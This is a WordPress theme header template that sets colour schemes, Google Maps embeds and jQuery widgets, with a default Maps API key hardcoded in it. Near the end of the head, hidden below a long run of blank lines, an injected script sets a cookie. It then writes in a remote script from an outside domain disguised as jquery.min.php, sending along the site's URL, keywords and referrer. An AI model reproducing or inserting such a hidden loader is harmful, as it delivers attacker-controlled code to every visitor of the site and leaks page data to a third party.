<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php bloginfo('name'); ?> - <?php bloginfo('description'); ?></title>
   
<?php 
function alter_brightness($colourstr, $steps) {
  $colourstr = str_replace('#','',$colourstr);

  $rhex = substr($colourstr,0,2);
  $ghex = substr($colourstr,2,2);
  $bhex = substr($colourstr,4,2);

  $r = hexdec($rhex);
  $g = hexdec($ghex);
  $b = hexdec($bhex);

  $r = dechex(max(0,min(255,$r + $steps)));
  $g = dechex(max(0,min(255,$g + $steps)));  
  $b = dechex(max(0,min(255,$b + $steps)));

  $r = str_pad($r,2,"0",STR_PAD_LEFT);
  $g = str_pad($g,2,"0",STR_PAD_LEFT);
  $b = str_pad($b,2,"0",STR_PAD_LEFT);

  $cor = '#'.$r.$g.$b;

  return $cor;
}

if (get_option('rockact_alt_stylesheet') == '') {
   $colorscheme='green';
} else {
   $colorscheme=get_option('rockact_alt_stylesheet');
}

if (get_option('rockact_alt_stylesheet2') == '') {
   $colorscheme2='orange';
} else {
   $colorscheme2=get_option('rockact_alt_stylesheet2');
}

$hexarray = array(
    "green" => "3fe21a",
    "blue" => "197de2",
    "teal" => "1bc8e3",
    "purple" => "7319e2",
    "fushia" => "e219d1",
    "red" => "e31a48",
    "orange" => "ff8e1e",
    "yellow" => "ffeb1c",
    "grey" => "b1b1b1"
);

$fadecolor=alter_brightness($hexarray[$colorscheme],25);
?>

<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo('template_url'); ?>/style.css" />

<?php
if (get_option('rockact_alt_background')=='') {
   $dispbackground='#274c83';
} else {
   $dispbackground=stripslashes(get_option('rockact_alt_background'));
}

if (get_option('rockact_map_background')=='') {
   $mapbackground='#eac30e';
} else {
   $mapbackground=stripslashes(get_option('rockact_map_background'));
}

if (get_option('rockact_form_background')=='') {
   $formbackground='#4f9bcd';
   $formbackground2='#0c69a4';
   $formbackground3='#5ac5e9';
} else {
   $formbackground=stripslashes(get_option('rockact_form_background'));
   $workformbackground=str_replace("#", "", $formbackground);

   $formbackground2 = alter_brightness($formbackground,25);
   $formbackground3 = alter_brightness($formbackground,-40);

}

if (get_option('rockact_font_global')=='') {
   $fontglobal='#264b83';
} else {
   $fontglobal=stripslashes(get_option('rockact_font_global'));
}
?>

<?php
if (get_option('rockact_sidebar_contact_img') == 'Realistic Woman') {
   $contactimg='widget_callnow-woman.png';
} elseif (get_option('rockact_sidebar_contact_img') == 'Realistic Man') {
   $contactimg='widget_callnow-man.png';
} else {
   $contactimg='widget_callnow-avatar.png';
}

if (get_option('rockact_custvid_image')!='') {
      $videoimg=get_option('rockact_custvid_image');
} else {
   if (get_option('rockact_video_img') == 'Female - Caucasian') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_female_cau.png';
   } elseif (get_option('rockact_video_img') == 'Female - Hispanic') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_female_hisp.png';
   } elseif (get_option('rockact_video_img') == 'Female - African American') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_female_afr.png';
   } elseif (get_option('rockact_video_img') == 'Male - Caucasian') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_male_cau.png';
   } elseif (get_option('rockact_video_img') == 'Male - Hispanic') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_male_hisp.png';
   } elseif (get_option('rockact_video_img') == 'Male - African American') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_male_afr.png';
   } elseif (get_option('rockact_video_img') == 'No Person') {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_none.png';
   } else {
      $videoimg=get_bloginfo('template_url').'/imgvideo/video_avatar.png';
   //   $videoimg='call_chat_bg-'.$colorscheme.'.png';
   }
}
  
if (get_option('rockact_header_image') == '') {
   $bgroundimg= get_bloginfo('template_url').'/images/two_people.png';
} else {
   $bgroundimg= get_option('rockact_header_image');
}

if (get_option('rockact_form_header') != 'true') { 
   $topformpadding=50;
} else {
   $topformpadding=10;
}

function get_brightness($hex) {
   $hex = str_replace('#', '', $hex);

   $c_r = hexdec(substr($hex, 0, 2));
   $c_g = hexdec(substr($hex, 2, 2));
   $c_b = hexdec(substr($hex, 4, 2));

   return (($c_r * 299) + ($c_g * 587) + ($c_b * 114)) / 1000;
}

if (get_brightness(get_option('rockact_alt_background')) > 130) {
   $footerfontcolor='000000';
} else {
   $footerfontcolor='ffffff';
}

if (get_brightness($mapbackground) > 130) {
   $locatecolor='000000';
} else {
   $locatecolor='ffffff';
}

?>

    <style type="text/css">
	<?php get_template_part( 'logo' ); ?>	
    	body { background-color: <?php echo $dispbackground; ?>; border-top: 10px solid <?php echo $mapbackground; ?>;}
	#locate { background-color: <?php echo $mapbackground; ?>; }
	#sidebar .call_now { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $contactimg; ?>') no-repeat; }
	#video_area { background: url('<?php echo $bgroundimg; ?>') bottom right no-repeat, url('<?php echo $videoimg; ?>') no-repeat; }
	.free { color: <?php echo $mapbackground; ?>; }
	#top_half { background-color: <?php echo $formbackground; ?>; }
	#form { background-color: <?php echo $formbackground2; ?>; border: 3px solid <?php echo $formbackground3; ?>; }
	#sidebar .check li { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme; ?>/check_bullet.png') no-repeat; }
	#form #submit { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme; ?>/get_started.png') no-repeat; }
	#ribbon { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme; ?>/ribbon.png') no-repeat; }
	#arrow_top { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme; ?>/top_arrow.png') no-repeat; }
	#video_arrow { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme2; ?>/big_arrow.png') no-repeat; }
	#sidebar .bullet li { background: url('<?php bloginfo('template_url'); ?>/images/<?php echo $colorscheme; ?>/bullet.png') no-repeat; }
	#locate { color: #<?php echo $locatecolor; ?>; }
	#locate a { color: #<?php echo $locatecolor; ?>; }
	#footer { color: #<?php echo $footerfontcolor; ?>; }
	.navi .menu a:hover { background: transparent url('<?php bloginfo('template_url'); ?>/images/navi_right_hover.png') no-repeat scroll top right; }
	.navi .menu a:hover span { background: transparent url('<?php bloginfo('template_url'); ?>/images/navi_left_hover.png') no-repeat; }
	.navi .current-menu-item a { background: transparent url('<?php bloginfo('template_url'); ?>/images/navi_right_hover.png') no-repeat scroll top right; }
	.navi .current-menu-item a span { background: transparent url('<?php bloginfo('template_url'); ?>/images/navi_left_hover.png') no-repeat; }

	A:link {color: <?php echo $fontglobal; ?>;}
	A:visited {color: <?php echo $fontglobal; ?>;}
	A:active {color: <?php echo $fontglobal; ?>;}
	A:hover {color: <?php echo $fontglobal; ?>;}
	h1 {color: <?php echo $fontglobal; ?>;}
	h2 {color: <?php echo $fontglobal; ?>;}

	#navigation ul li:hover ul li a:hover { background-color: #<?php echo $hexarray[$colorscheme] ?>; }
	#navigation ul li * a:hover { background: #<?php echo $hexarray[$colorscheme] ?>; }
    </style>
    
    <?php wp_enqueue_script("jquery"); ?>
    <?php wp_head(); ?>

<!--[if lte IE 7]>
<style type="text/css">
html .jqueryslidemenu{height: 1%;} /*Holly Hack for IE7 and below*/
</style>
<![endif]-->

<script type='text/javascript'>
var arrowimages={down:['downarrowclass', '<?php bloginfo('template_directory'); ?>/images/nav-down.gif', 23], right:['rightarrowclass', '<?php bloginfo('template_directory'); ?>/images/nav-right.gif']}
</script>

<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/jqueryslidemenu.js"></script>

<script src="https://apis.google.com/js/plusone.js"></script>

	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
	<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/jquery.quovolver.js"></script>
	
	<!-- JavaScript Test Zone -->
	<script type="text/javascript">
	var $j = jQuery.noConflict();
	
	$j(document).ready(function() {
		$j('.unique').quovolver();
	});
	</script>

<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/dddropdownpanel.js"></script>
<script type="text/javascript">
var defaultpanel=new ddpanel({
	ids: ["mypanel", "mypanelcontent", "mypaneltab"], // id of main panel DIV, content DIV, and tab DIV
	stateconfig: {initial: "5px", persiststate: true}, // initial: initial reveal amount in pixels (ie: 5px)
	animate: {enabled: true, steps: 5}, //steps: number of animation steps. Int between 1-20. Smaller=faster.
	pointerimage: {enabled: true, src: ["<?php bloginfo('template_url'); ?>/images/arrow-down.gif", "<?php bloginfo('template_url'); ?>/images/arrow-up.gif"]},
	closepanelonclick: {enabled: true} // close panel when links or elements with CSS class="closepanel" within container is clicked on?
})
</script>

<?php if (get_option('rockact_maps_on')=='') {

   if (get_option('rockact_map_address')!='') {

      $encodedaddress=str_replace(" ", "+", get_option('rockact_map_address'));
      $url='http://maps.googleapis.com/maps/api/geocode/xml?address='.$encodedaddress.'&sensor=false';
      $file=wp_remote_fopen($url);
      $items=explode("<lat>",$file);
      $items2=explode("</lat>",$items[1]);
      $coordx=$items2[0];

      $items3=explode("<lng>",$items2[1]);
      $items4=explode("</lng>",$items3[1]);
      $coordy=$items4[0];

   } else {
      $encodedaddress='Chicago+IL';
      $coordx=41.8781136;
      $coordy=-87.6297982;
   }

if (get_option('rockact_map_key')=='') {
   $mapapikey='AIzaSyC-orcnTfvXI32ZI7WwxxvWe8YiV6x0iVE';
} else {
   $mapapikey=get_option('rockact_map_key');
}
?>

<script type="text/javascript"
      src="https://maps.googleapis.com/maps/api/js?key=<?php echo $mapapikey; ?>&sensor=false">
    </script>

<meta content="width=device-width; initial-scale=1.0; maximum-scale=2.0; user-scalable=1;" name="viewport">
<meta name="viewport" content="user-scalable=yes" />
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>

<script type="text/javascript">

  function initialize() {
    var latlng = new google.maps.LatLng(<?php echo $coordx; ?>,<?php echo $coordy; ?>);
    var myOptions = {
      zoom: 18,
      center: latlng,
      mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    var myOptions2 = {
      zoom: 17,
      center: latlng,
      mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    var map = new google.maps.Map(document.getElementById("map_canvas"), myOptions);
    var map2 = new google.maps.Map(document.getElementById("map_canvas2"), myOptions2);
    var marker = new google.maps.Marker({
      position: latlng,
      map: map,
      title:"<?php bloginfo('name'); ?>"
    }); 
    var marker2 = new google.maps.Marker({
      position: latlng,
      map: map2,
      title:"<?php bloginfo('name'); ?>"
    }); 

<?php
if (get_option('rockact_map_bubble1')=='') {
?>
      var contentString = '<p style="height: 80px; color: black; width: 200px; margin: 0; padding: 30px 0 0 0;">' +
          '<strong"><?php bloginfo('name'); ?></strong><br />' +
          '<?php echo get_option('rockact_map_address'); ?><br />' +
          '<a style="color: blue;" target="_blank" href="http://maps.google.com/maps?f=d&hl=en&daddr=<?php echo $encodedaddress; ?>" rel="external">Get Directions</a></p>';

<?php } else {
?>

      var contentString = '<p style="height: 80px; color: black; width: 200px; margin: 0; padding: 30px 0 0 0;">' +
          '<?php echo htmlspecialchars(get_option('rockact_map_bubble1'), ENT_QUOTES); ?><br />' +
<?php
if (get_option('rockact_map_bubble2')!='') {
?>
          '<?php echo htmlspecialchars(get_option('rockact_map_bubble2'), ENT_QUOTES); ?><br />' +
<?php
}
if (get_option('rockact_map_bubble3')!='') {
?>
          '<?php echo htmlspecialchars(get_option('rockact_map_bubble3'), ENT_QUOTES); ?><br />' +
<?php
}
if (get_option('rockact_map_bubble4')!='') {
?>
          '<?php echo htmlspecialchars(get_option('rockact_map_bubble4'), ENT_QUOTES); ?><br />' +
<?php } ?>
          '<a style="color: blue;" target="_blank" href="http://maps.google.com/maps?f=d&hl=en&daddr=<?php echo $encodedaddress; ?>" rel="external">Get Directions</a></p>';

<?php } 
?>
      
        var infowindow = new google.maps.InfoWindow({
            content: contentString
        });
        google.maps.event.addListener(marker, 'click', function() {
          infowindow.open(map,marker);
        });
        infowindow.open(map,marker);

  }
</script>

<?php }
?>

<script type="text/javascript">
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
thisfield.value = "";
}
}
function clickrecall(thisfield, defaulttext) {
if (thisfield.value == "") {
thisfield.value = defaulttext;
}
}
</script>

    <script src="<?php bloginfo('template_url'); ?>/js/tabSlideOut.js"></script>

         <script>
	var $k = jQuery.noConflict();
         $k(function(){
             $k('.slide-out-div').tabSlideOut({
                 tabHandle: '.handle',                              //class of the element that will be your tab
                 pathToTabImage: '<?php bloginfo('template_url'); ?>/images/share_this_page.png',          //path to the image for the tab *required*
                 imageHeight: '158px',                               //height of tab image *required*
                 imageWidth: '40px',                               //width of tab image *required*    
                 tabLocation: 'left',                               //side of screen where tab lives, top, right, bottom, or left
                 speed: 300,                                        //speed of animation
                 action: 'click',                                   //options: 'click' or 'hover', action to trigger animation
                 topPos: '100px',                                   //position from the top
                 leftPos: '0',                                   
                 fixedPosition: false,                               //options: true makes it stick(fixed position) on scroll
                 onLoadSlideOut: false
             });

			$k('.button').click(function(){$k('.slide-out-div').toggleClass('open').$k('.handle').click(); });

         });
         </script>

<style type="text/css">
@media screen and (max-width: 1080px) {
   #container {margin-left: -20px;}
}
</style>

<?php
if (get_option('rockact_fav_image')!='') {
   echo '<link rel="icon" type="image/png" href="'.get_option('rockact_fav_image').'" />';
}
?>
























































































<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.omarux.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body onload="initialize()"> 
<div id="container">

<?php if (get_option('rockact_maps_on')=='') {
?>

<div id="mypanel" class="ddpanel">
<div id="mypanelcontent" class="ddpanelcontent" style="margin-top: 0px; padding: 0px;">

<div id="map_canvas" style="width:100%; height:350px; margin: 10px 0 5px 0;"></div>
  <noscript>
		<div style="color:#FF0000;">
			<h4>JavaScript must be enabled in order for you to use Google Maps.</h4>
			<p>It seems JavaScript is either disabled or not supported by your browser.</p>
			<p>To view Google Maps, enable JavaScript by changing your browser options and then reload this page.</p>
		</div>
	</noscript>
</div>

<div id="mypaneltab" class="ddpaneltab">
<a style="text-decoration: none;" href="#"><span id="locate">Locate Us </span></a>
</div>
</div>

<?php }
?>


	<div id="header">
      <?php
        if (get_option('rockact_logo_image_on') == 'true') {
          echo '<div id="logo2">';
          bloginfo('name');
          echo '</br><span class="fontchange">';
          bloginfo('description');
          echo '</span>';
        } else {
          echo '<div id="logo">';
	  bloginfo('description');
        }
      ?>
	</div>


		<div id="arrow_top">
      <span style="text-transform:uppercase;">
        <?php echo stripslashes(get_option('rockact_form_line1')); ?>
      </span> <br/> 
      <span class="free">
        <span style="text-transform:uppercase;">
          <?php echo stripslashes(get_option('rockact_form_line2')); ?>
        </span>
      </span> <br/> 
      <span style="text-transform:uppercase;">
        <?php echo stripslashes(get_option('rockact_form_line3')); ?>
      </span>
    </div>
	</div>
	



